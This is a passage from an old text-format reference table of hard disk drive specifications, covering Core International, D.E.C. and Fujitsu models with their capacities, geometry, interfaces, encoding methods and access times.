ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-30R 5.25 FULL 48.0MB 733 26 3 5 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-32 5.25 HALF 31.0MB 733 17 3 5 ST412 MFM 21mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-32R 5.25 HALF 48.0MB 733 26 3 5 ST412 RLL(2,7) 21mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 9 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CORE INTL. AT-40 5.25 FULL 40.0MB 924 17 3 5 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-40R 5.25 FULL 61.0MB 924 26 3 5 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-63 5.25 FULL 63.0MB 42.0MB 988 17 3 5 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-63R 5.25 FULL 65.0MB 988 26 3 5 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-72 5.25 FULL 72.0MB 924 17 5 9 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. AT-72R 5.25 FULL 107.0MB 924 26 5 9 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-1000S 5.25 1200.0MB 14 SCSI RLL(2,7) Y 18mS 12.3Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-100F 5.25 FULL 101.0MB ESDI RLL(2,7) Y 9mS 15.0Mb 150K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-150 5.25 FULL 156.0MB 969 35 3 5 ESDI RLL(2,7) 16mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-175 5.25 177.8MB 8 ESDI RLL(2,7) Y 16mS 10.0Mb 150K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-200 5.25 200.0MB 8 IDE(AT) 16mS 8.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-260 5.25 FULL 260.0MB 1212 35 6 12 ESDI RLL(2,7) 16mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-310 5.25 FULL 311.0MB 1582 35 6 12 ESDI RLL(2,7) Y 16mS 10.0Mb 150K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-315 5.25 FULL 340.0MB 1447 57 4 8 ESDI RRL(2,7) Y 16mS 20.0Mb 150K 20.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-380 5.25 FULL 383.0MB ESDI RLL(2,7) Y 16mS 10.0Mb 150K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-40 5.25 FULL 40.0MB 564 35 2 4 ESDI RLL(2,7) 10mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-650 5.25 FULL 658.0MB 1661 53 8 15 ESDI RLL(2,7) Y 16mS 20.0Mb 150K 20.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-650S 5.25 FULL 663.0MB 14 SCSI RLL(2,7) Y 18mS 12.3Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-655 5.25 FULL 680.0MB 1447 57 8 16 ESDI RLL(2,7) Y 16mS 20.0Mb 150K 20.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-30 5.25 HALF 32.0MB 733 17 3 5 ST412 MFM 21mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-30R 5.25 HALF 48.0MB 733 26 3 5 ST412 RLL(2,7) 21mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-40 5.25 HALF 41.0MB 963 17 3 5 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-40R 5.25 HALF 64.0MB 963 26 3 5 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-70 5.25 FULL 71.0MB 918 17 5 9 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. OPTIMA-70R 5.25 FULL 109.0MB 918 26 5 9 ST412 RLL(2,7) 26mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CORE INTL. HC-90 5.5 HALF 91.0MB 969 35 3 5 ESDI RLL(2,7) Y 15mS 10.0Mb 99K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + D.E.C. RZ23 3.50 HALF 104.0MB SCSI 33mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + D.E.C. RZ24 3.50 HALF 209.0MB SCSI 24mS 32.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 10 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? 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615 26 2 4 ST412 RLL(2,7) 35mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2226D2 3.50 HALF 30.0MB 615 300 17 3 6 ST412 MFM 35mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2226DR 3.50 HALF 49.0MB 615 26 3 6 ST412 RLL(2,7) 35mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2227D2 3.50 HALF 51.2MB 42.8MB 615 128 17 4 8 SM ST412 MFM 35mS 5.0Mb 30K 7.5W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2227DR 3.50 HALF 65.0MB 615 26 4 8 ST412 RLL(2,7) 35mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2611SA 3.50 SUBH 45.1MB 1334 1 2 SCSI RLL(1,7) 25mS 7.4Mb 50K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2611T 3.50 SUBH 45.1MB 1334 1 2 IDE(AT) RLL(1,7) 25mS 7.4Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2612SA 3.50 HALF 90.8MB 1334 2 4 SCSI RLL(1,7) 25mS 7.4Mb 50K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2612T 3.50 HALF 90.2MB 1334 2 4 IDE(AT) RLL(1,7) 25mS 7.4Mb 30K + 